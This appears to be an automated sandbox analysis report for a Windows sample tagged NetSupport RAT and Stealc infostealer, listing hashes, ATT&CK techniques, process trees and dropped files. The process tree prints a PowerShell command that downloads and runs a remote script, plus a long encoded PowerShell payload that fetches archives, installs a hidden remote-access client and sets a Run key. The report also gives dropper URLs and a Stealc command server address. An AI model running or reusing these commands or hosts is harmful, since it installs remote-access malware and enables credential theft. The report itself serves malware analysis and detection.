netsupport | b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86

Analysis

max time kernel
147s
max time network
150s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
11/09/2024, 16:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
Size

6.8MB
MD5

acb755d083c876f6a80105c17cc61754
SHA1

8ccfc2b30402e76a59ed07873b0ccf589728fd22
SHA256

b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86
SHA512

2d26da0b24c61e05a66583b548672f00b4351c87669fb8b7e4e71a73da4a2c0e470d7c6aa8072976fe8ca2ac5ea6b75e41f54b426c0d1de06aa118a83283b70b
SSDEEP

196608:DzSpVt4hhiIbZg4T4hac7p6eDcGRY9Dc+/7/MS6a:DWp74hVbehacQeHwDc+/7zb

Score

10^/10

netsupport stealc workbaza credential_access discovery execution persistence rat spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.et-ba.com.tr/temp/b64_akam_kent_2708.ps1

Extracted

Language

ps1

Source

URLs

exe.dropper

https://calbyiris.com/fvz/f2v.zip

exe.dropper

https://calbyiris.com/fvz/f1v.zip

exe.dropper

https://calbyiris.com/fvz/f3v.zip

exe.dropper

https://calbyiris.com/fvz/f4v.zip

exe.dropper

https://calbyiris.com/fvf/

Extracted

Family

stealc

Botnet

Workbaza

http://5.35.36.211

Attributes

url_path
/cadb6378d4b16104.php

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	2420	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
4668	client32.exe

Loads dropped DLL 13 IoCs

pid	Process
2040	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
2040	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
2040	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
2040	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
2040	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
2040	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
2040	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
2040	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
4668	client32.exe
4668	client32.exe
4668	client32.exe
4668	client32.exe
4668	client32.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2842058299-443432012-2465494467-1000\Software\Microsoft\Windows\CurrentVersion\Run\HDiskDefragm = "C:\\Users\\Admin\\AppData\\Roaming\\HDiskDefragm\\client32.exe"	powershell.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2420	powershell.exe
1604	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	client32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

pid	Process
2040	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
2040	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
2040	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
2040	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
2420	powershell.exe
2420	powershell.exe
1604	powershell.exe
1604	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2420	powershell.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeSecurityPrivilege	4668	client32.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4668	client32.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 5112 wrote to memory of 2040	5112	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe	79
PID 5112 wrote to memory of 2040	5112	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe	79
PID 5112 wrote to memory of 2040	5112	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe	79
PID 2040 wrote to memory of 2420	2040	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe	80
PID 2040 wrote to memory of 2420	2040	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe	80
PID 2040 wrote to memory of 2420	2040	b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe	80
PID 2420 wrote to memory of 1604	2420	powershell.exe	82
PID 2420 wrote to memory of 1604	2420	powershell.exe	82
PID 2420 wrote to memory of 1604	2420	powershell.exe	82
PID 1604 wrote to memory of 4668	1604	powershell.exe	84
PID 1604 wrote to memory of 4668	1604	powershell.exe	84
PID 1604 wrote to memory of 4668	1604	powershell.exe	84

C:\Users\Admin\AppData\Local\Temp\b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
"C:\Users\Admin\AppData\Local\Temp\b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5112
- C:\Users\Admin\AppData\Local\Temp\b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe
  "C:\Users\Admin\AppData\Local\Temp\b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86.exe"
  2⤵
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2040
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -nop -c "iex(New-Object Net.WebClient).DownloadString('https://www.et-ba.com.tr/temp/b64_akam_kent_2708.ps1')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2420
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nOPRofIlE -exEcUTiONpOlI bypASS -WinDOWST HiD -ec JAA3AGMAcQBNAFEAYgA9ACcAaAB0AHQAcABzADoALwAvAGMAYQBsAGIAeQBpAHIAaQBzAC4AYwBvAG0ALwBmAHYAegAvAGYAMgB2AC4AegBpAHAAJwA7ACAAJABZAEcAUwBKAHkAPQAnADgATABmAHoAdQAuAHoAaQBwACcAOwAgAGMASABkAGkAcgAgACQAZQBuAFYAOgBhAFAAUABEAGEAdABhADsAIAAkAGEAUwBPAGkAQwBOAEcAPQAnAEgARABpAHMAawBEAGUAZgByAGEAZwBtACcAOwAgACQATwBjAHQAVABKAE4ATAA9ACcATAAxAFAANQBrAEcALgB6AGkAcAAnADsAIAAkAGkAcwBVAGwAYQA9ACcAaAB0AHQAcABzADoALwAvAGMAYQBsAGIAeQBpAHIAaQBzAC4AYwBvAG0ALwBmAHYAegAvAGYAMQB2AC4AegBpAHAAJwA7ACAAWwBOAEUAVAAuAHMARQByAHYAaQBjAGUAUABPAEkAbgB0AE0AYQBOAGEAZwBFAFIAXQA6ADoAUwBlAEMAdQByAEkAVABZAHAAUgBvAHQAbwBjAG8ATAAgAD0AIABbAE4ARQB0AC4AcwBFAEMAVQBSAGkAVAB5AHAAcgBPAHQAbwBjAE8AbABUAHkAUABlAF0AOgA6AHQATABTADEAMgA7ACAAJABVAHIAMgA0AGwAWABYAD0AZwBjAE0AIABTAFQAYQBSAHQALQBiAGkAdABzAHQAUgBBAE4AcwBGAGUAUgAgAC0ARQBSAFIAbwBSAGEAYwBUAEkAbwBOACAAUwBJAGwARQBOAFQATAB5AGMATwBOAFQAaQBOAFUAZQA7ACAAJABwADcAbQA3AHIAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbABiAHkAaQByAGkAcwAuAGMAbwBtAC8AZgB2AHoALwBmADMAdgAuAHoAaQBwACcAOwAgACQARQBqAHQAYQBPAD0AZwBjAE0AIABFAHgAcABhAG4ARAAtAEEAUgBDAEgASQB2AEUAIAAtAEUAcgBSAG8AcgBBAEMAVABJAG8AbgAgAFMASQBMAEUAbgBUAEwAeQBjAE8AbgBUAGkAbgB1AGUAOwAgACQASgA0ADUASwBwAFIAdwByAD0AJwBoAHQAdABwAHMAOgAvAC8AYwBhAGwAYgB5AGkAcgBpAHMALgBjAG8AbQAvAGYAdgB6AC8AZgA0AHYALgB6AGkAcAAnADsAIAAkAGYAdQBSAFQANABHAFEAWgA9ACcAQwBlAG4AdwBnAC4AegBpAHAAJwA7ACAAJAB6AG4AOABpAEIAVQBHAD0AJwA5ADkANABVAHgALgB6AGkAcAAnADsAIAAkAGgARAB0AGEATQAyAFYAPQAiAHsAMAB9AFwAewAxAH0AIgAgAC0AZgAgACQARQBOAFYAOgBBAFAAcABEAGEAVABhACwAIAAkAGYAdQBSAFQANABHAFEAWgA7ACAAJABIAHMAaQBpAFIASwBWAD0ASgBvAGkAbgAtAHAAQQB0AGgAIAAtAHAAQQBUAGgAIAAkAEUATgBWADoAQQBQAHAARABhAFQAYQAgAC0AYwBIAGkATABkAFAAQQB0AGgAIAAkAFkARwBTAEoAeQA7ACAAJAA5ADcARABCADgAYwA9ACQARQBuAFYAOgBBAFAAUABEAGEAdABhACwAIAAkAE8AYwB0AFQASgBOAEwAIAAtAEoATwBJAE4AIAAnAFwAJwA7ACAAJAB6ADUAVgBkAFgAPQAkAGUATgBWADoAQQBQAFAAZABBAHQAYQArACcAXAAnACsAJAB6AG4AOABpAEIAVQBHADsAIAAkAEUAVQAzAGoAYwA9ACcAQgBpAFQAcwBhAEQATQBpAE4ALgBlAFgAZQAgAC8AdABSAEEAbgBzAGYARQByACAAUwBEAE4AWgBnADUAIAAvAGQAbwB3AE4AbABPAEEARAAgAC8AUABSAGkAbwByAEkAVAB5ACAAbgBPAFIAbQBBAGwAJwAsACAAJABpAHMAVQBsAGEALAAgACQAaABEAHQAYQBNADIAVgAgAC0AagBvAEkATgAgACcAIAAnADsAIAAkAFIAdAAzAFUATQBSADQAPQAnAEIAaQBUAHMAYQBEAE0AaQBOAC4AZQBYAGUAIAAvAHQAUgBBAG4AcwBmAEUAcgAgAFMARABOAFoAZwA1ACAALwBkAG8AdwBOAGwATwBBAEQAIAAvAFAAUgBpAG8AcgBJAFQAeQAgAG4ATwBSAG0AQQBsACAAJwArACQASgA0ADUASwBwAFIAdwByACsAJwAgACcAKwAkAEgAcwBpAGkAUgBLAFYAOwAgACQAQwBVAEMAawBoAD0AIgBCAGkAdABTAGEARABtAEkATgAuAGUAWABFACAALwB0AFIAQQBOAFMAZgBlAFIAIABGAEsATQB0AFQARQAgAC8AZABvAHcAbgBMAE8AQQBEACAALwBwAFIASQBvAFIAaQBUAHkAIABOAE8AcgBNAGEATAAgAHsAMAB9ACAAewAxAH0AIgAgAC0AZgAgACQANwBjAHEATQBRAGIALAAgACQAOQA3AEQAQgA4AGMAOwAgACQAdAA3AGcAZQBZAEIAbQA9ACIAJABFAG4AdgA6AGEAUABwAEQAYQBUAEEAXAAkAGEAUwBPAGkAQwBOAEcAIgA7ACAAJABxAEMANwBHAEMAPQAnAEIAaQBUAHMAYQBEAG0AaQBOAC4AZQB4AGUAIAAvAHQAUgBBAG4AUwBGAGUAcgAgAGsAbwA5AGwAQgAgAC8AZABvAHcAbgBMAE8AQQBkACAALwBwAFIASQBPAFIASQBUAFkAIABOAG8AUgBNAGEAbAAnACwAIAAkAHAANwBtADcAcgAsACAAJAB6ADUAVgBkAFgAIAAtAEoATwBpAG4AIAAnACAAJwA7ACAAaQBGACAAKAAkAEUAagB0AGEATwApACAAewAgAGkARgAgACgAJABVAHIAMgA0AGwAWABYACkAIAB7ACAAcwB0AGEAUgBUAC0AQgBJAHQAUwBUAFIAYQBOAHMARgBFAFIAIAAtAHMATwBVAFIAQwBFACAAJABwADcAbQA3AHIAIAAtAEQARQBzAHQAaQBOAGEAdABJAE8AbgAgACQAegA1AFYAZABYADsAIABzAHQAQQBSAHQALQBiAEkAdABTAFQAcgBBAE4AcwBGAEUAcgAgAC0AcwBPAFUAUgBDAEUAIAAkAEoANAA1AEsAcABSAHcAcgAgAC0AZABFAHMAdABJAG4AYQBUAGkATwBuACAAJABIAHMAaQBpAFIASwBWADsAIABzAFQAYQBSAFQALQBiAEkAVABTAHQAcgBBAE4AUwBGAEUAUgAgAC0AUwBvAFUAcgBjAGUAIAAkADcAYwBxAE0AUQBiACAALQBkAEUAcwBUAEkAbgBBAFQASQBvAE4AIAAkADkANwBEAEIAOABjADsAIABTAFQAYQBSAFQALQBiAEkAVABzAFQAcgBBAG4AcwBmAEUAUgAgAC0AUwBPAHUAcgBDAEUAIAAkAGkAcwBVAGwAYQAgAC0ARABFAHMAdABJAG4AYQB0AGkAbwBuACAAJABoAEQAdABhAE0AMgBWADsAIAB9ACAAZQBMAHMAZQAgAHsAaQBOAHYATwBrAEUALQBlAHgAUAByAEUAUwBzAGkATwBuACAALQBDAG8ATQBtAGEAbgBEACAAJABSAHQAMwBVAE0AUgA0ADsAIABpAE4AdgBPAGsARQAtAGUAeABQAHIARQBTAHMAaQBPAG4AIAAtAEMAbwBNAG0AYQBuAEQAIAAkAEMAVQBDAGsAaAA7ACAAaQBlAHgAIAAtAGMAbwBtAG0AYQBuAGQAIAAkAHEAQwA3AEcAQwA7ACAAaQBlAHgAIAAtAGMAbwBtAG0AYQBuAGQAIAAkAEUAVQAzAGoAYwA7ACAAfQAgAEUAeABQAEEATgBkAC0AYQBSAEMASABpAFYARQAgAC0AUABhAFQAaAAgACQASABzAGkAaQBSAEsAVgAgAC0ARABFAFMAdABpAG4AYQBUAGkATwBOAHAAYQB0AEgAIAAkAHQANwBnAGUAWQBCAG0AOwAgAGUAeABwAGEATgBkAC0AQQBSAGMASABJAHYAZQAgAC0AUABhAFQASAAgACQAOQA3AEQAQgA4AGMAIAAtAEQARQBTAFQAaQBuAEEAVABpAG8AbgBwAGEAdABIACAAJAB0ADcAZwBlAFkAQgBtADsAIABFAFgAcABhAE4AZAAtAEEAUgBjAGgAaQB2AGUAIAAtAHAAYQBUAEgAIAAkAHoANQBWAGQAWAAgAC0AZABlAHMAdABJAG4AYQB0AEkAbwBOAHAAYQB0AGgAIAAkAHQANwBnAGUAWQBCAG0AOwAgAGUAWABQAEEATgBEAC0AYQBSAGMAaABJAHYAZQAgAC0AUABBAHQAaAAgACQAaABEAHQAYQBNADIAVgAgAC0AZABlAFMAVABpAG4AQQB0AGkAbwBOAFAAYQBUAEgAIAAkAHQANwBnAGUAWQBCAG0AOwAgAHIARQBtAG8AVgBlAC0AaQB0AGUATQAgAC0AUABBAFQASAAgACQAegA1AFYAZABYADsAIABEAGUAbAAgAC0AcABhAFQAaAAgACQASABzAGkAaQBSAEsAVgA7ACAAcgBEACAALQBQAGEAVABIACAAJABoAEQAdABhAE0AMgBWADsAIABFAHIAQQBTAEUAIAAtAFAAYQB0AGgAIAAkADkANwBEAEIAOABjADsAIAB9ACAAZQBsAHMAZQAgAHsAIAAkAFkAcwBtAFEASgA5AD0AJwBoAHQAdABwAHMAOgAvAC8AYwBhAGwAYgB5AGkAcgBpAHMALgBjAG8AbQAvAGYAdgBmAC8AJwA7ACAATgBpACAALQBQAGEAVABIACAAJABFAE4AVgA6AGEAcABwAEQAQQB0AEEAIAAtAE4AQQBtAGUAIAAkAGEAUwBPAGkAQwBOAEcAIAAtAEkAdABlAE0AVABZAHAARQAgACcAZABpAHIAZQBjAHQAbwByAHkAJwA7ACAAJAA0AG8ARwAzAFIATgA9AEAAKAAnAEEAdQBkAGkAbwBDAGEAcAB0AHUAcgBlAC4AZABsAGwAJwAsACAAJwBUAEMAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwBwAGMAaQBjAGEAcABpAC4AZABsAGwAJwAsACAAJwBQAEMASQBDAEwAMwAyAC4ARABMAEwAJwAsACAAJwByAGUAbQBjAG0AZABzAHQAdQBiAC4AZQB4AGUAJwAsACAAJwBOAFMATQAuAEwASQBDACcALAAgACcAUABDAEkAQwBIAEUASwAuAEQATABMACcALAAgACcAbgBzAG0AXwB2AHAAcgBvAC4AaQBuAGkAJwAsACAAJwBtAHMAdgBjAHIAMQAwADAALgBkAGwAbAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcASABUAEMAVABMADMAMgAuAEQATABMACcALAAgACcAbgBzAGsAYgBmAGwAdAByAC4AaQBuAGYAJwAsACAAJwBjAGwAaQBlAG4AdAAzADIALgBlAHgAZQAnACkAOwAgAGkARgAgACgAJABVAHIAMgA0AGwAWABYACkAIAB7ACAAJAA0AG8ARwAzAFIATgAgAHwAIABGAE8AUgBlAEEAYwBIACAAewAgACQAZwBGAFQANABDAGQARAA9ACQAWQBzAG0AUQBKADkAKwAkAF8AOwAgACQAcQBtAEUAcwBxAD0AIgB7ADAAfQBcAHsAMQB9ACIAIAAtAGYAIAAkAHQANwBnAGUAWQBCAG0ALAAgACQAXwA7ACAAcwBUAEEAUgB0AC0AQgBJAFQAUwB0AFIAYQBuAFMARgBFAFIAIAAtAFMATwB1AFIAQwBlACAAJABnAEYAVAA0AEMAZABEACAALQBEAGUAUwBUAEkAbgBBAFQAaQBvAE4AIAAkAHEAbQBFAHMAcQA7ACAAfQA7AH0AIABFAEwAUwBFACAAewAgACQANABvAEcAMwBSAE4AIAB8ACAAJQAgAHsAIAAkAGcARgBUADQAQwBkAEQAPQAkAFkAcwBtAFEASgA5ACsAJABfADsAIAAkAHEAbQBFAHMAcQA9ACIAJAB0ADcAZwBlAFkAQgBtAFwAJABfACIAOwAgACQAWQBuAFMASwBZAD0AJwBCAGkAdABzAEEAZABtAGkAbgAuAGUAWABFACAALwBUAHIAQQBOAFMAZgBlAFIAIABzAGwAeQBFAEUARABRAFMAIAAvAGQAbwB3AG4ATABPAGEAZAAgAC8AUAByAGkATwBSAGkAVABZACAATgBvAFIATQBhAGwAIAAnACsAJABnAEYAVAA0AEMAZABEACsAJwAgACcAKwAkAHEAbQBFAHMAcQA7ACAAJgAgACQAWQBuAFMASwBZADsAfQA7ACAAfQA7ACAAfQA7ACAAJABXAHMAMABQAHUASAB4AHEAPQBnAEkAIAAkAHQANwBnAGUAWQBCAG0AIAAtAGYAbwBSAGMARQA7ACAAJABXAHMAMABQAHUASAB4AHEALgBBAHQAdAByAEkAYgB1AHQAZQBzAD0AJwBIAGkAZABkAGUAbgAnADsAIAAkAHEAVQBzAEUAeQA9ACIAJAB0ADcAZwBlAFkAQgBtAFwAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAIgA7ACAAQwBkACAAJAB0ADcAZwBlAFkAQgBtADsAIABuAGUAVwAtAGkAdABlAG0AcAByAG8AUABFAHIAdAB5ACAALQBQAEEAVABIACAAJwBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAnACAALQBOAEEAbQBlACAAJABhAFMATwBpAEMATgBHACAALQB2AGEATABVAEUAIAAkAHEAVQBzAEUAeQAgAC0AcABSAG8AcABFAHIAdAB5AFQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwAgAHMAdABBAFIAVAAtAFAAUgBvAEMARQBTAHMAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7AA==
      4⤵
      Adds Run key to start application
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1604
    - - C:\Users\Admin\AppData\Roaming\HDiskDefragm\client32.exe
        
        "C:\Users\Admin\AppData\Roaming\HDiskDefragm\client32.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:4668

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
4a86dfe2dff3994056e7f97854798f41

SHA1
2c618b26008e3dc6607eff7e3fe2dca42376588c

SHA256
d667a9fc556be57850089669354c1cf86cab949d034808d202fb658561799010

SHA512
3bb29aae3c8e6b478d561001d599891211608dd83c63b6937d7fb0bceb274fb7c29efb00b9999ad1d5f7625b9e3f1ae96ec87e07952a6a2b6bc324195833f382

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
d39fd39000d0f423e7f5b946e91ebd83

SHA1
5934b4a4a5a3a09e41fda263d683559b3e2488f4

SHA256
932c56b74c4488b19f136178efd2c7aaaf864778e55fa4343ba9d8e9837cca4a

SHA512
b0469ec2ad1fc09653b65efaf71a7ab21238f86982285f28549c9181ff4bff945d81c7f5269f8142836ffa51a2595c7f308e4cbf9fef59b4b14d3a00be7becdf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI51122\VCRUNTIME140.dll

Filesize
74KB

MD5
afa8fb684eded0d4ca6aa03aebea446f

SHA1
98bbb8543d4b3fbecebb952037adb0f9869a63a5

SHA256
44de8d0dc9994bff357344c44f12e8bfff8150442f7ca313298b98e6c23a588e

SHA512
6669eec07269002c881467d4f4af82e5510928ea32ce79a7b1f51a71ba9567e8d99605c5bc86f940a7b70231d70638aeb2f6c2397ef197bd4c28f5e9fad40312

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI51122\_ctypes.pyd

Filesize
114KB

MD5
21e301d58c481660af1efdebc4ad63fe

SHA1
ec10719afcbd6317355bbe0de04beb3d5c067651

SHA256
003429b4e119dc08798aada64c13002b210507291afae8cace5eb0032754e78e

SHA512
fe06fcb3f6f3f76b7de0ea92ea4fb286c6f8643cbe0f34a9df9b354434aabe3941a3bf2028f3a2e61183f4c39ee2f80ec5dfdcd9854416423142142508a71493

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI51122\_socket.pyd

Filesize
69KB

MD5
2df573607b053e4d8ba0eba9be96541c

SHA1
d41b40c468898c9a2e4d6be434c7eea57724b546

SHA256
a591d3054c741496889e1a427516d8aab89bb94636b96467213fa6449df9eb26

SHA512
21fb191b49092abf5bc0ab029fdff0a63b7b77ed4edbf13b0c74eb8d3e5a9ebd5ba8314c0f8293ad5c922c5ad0849a23d1fa05e1c6e3104c23aab85dcd095e56

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI51122\base_library.zip

Filesize
781KB

MD5
d214306a963d6db9dbe73c65d9b7c23e

SHA1
e42d3786f3ecf2cffee2ca2b7821973630431231

SHA256
5dd6afe3439d4eb8673de441ed980825919110abc2b1360c7a02a3cc365fcca8

SHA512
76601a39f1e84eaf3257a4989a45b6e2ee8492788239bb8f42729bfdbfbd3a50949295fd459ee4d9649fd16c3815740d7bf8152c4b707432a2a480ced711473c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI51122\libffi-7.dll

Filesize
28KB

MD5
bc20614744ebf4c2b8acd28d1fe54174

SHA1
665c0acc404e13a69800fae94efd69a41bdda901

SHA256
0c7ec6de19c246a23756b8550e6178ac2394b1093e96d0f43789124149486f57

SHA512
0c473e7070c72d85ae098d208b8d128b50574abebba874dda2a7408aea2aabc6c4b9018801416670af91548c471b7dd5a709a7b17e3358b053c37433665d3f6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI51122\python39.dll

Filesize
4.3MB

MD5
84741db3367d6998108d22e03eaf2a71

SHA1
6564ab918223d0074dfbf9bc5d062fd3a2003079

SHA256
3e0c22d1451c3f3578850990f54916eb276bb45b951649d6478523566dfa8059

SHA512
1a6aa94ec97df73b23b0d5079bafa92c13f9786f5c488046e95804f4701baeecb1beb9fd96824a6009355321adb7319ac643af40ff0c6b01733050dab2b648c0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI51122\select.pyd

Filesize
24KB

MD5
e2642d30be324bd86d711ada36797b85

SHA1
c474699a4853f0157708901213d3165530c45a69

SHA256
bb87be114067ab856067dbe74ba421c21cb0f36ad1960af0f5d61bda2e753fa2

SHA512
b2bb79f229d86e74d04bae5ef4813909afeaac530ce71f384c2ce1e1c690d792b413255c35e97b0ef9ff72c68d779dc044a03646d35777a40f1a427eafc14666

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1atx5qhe.kdl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
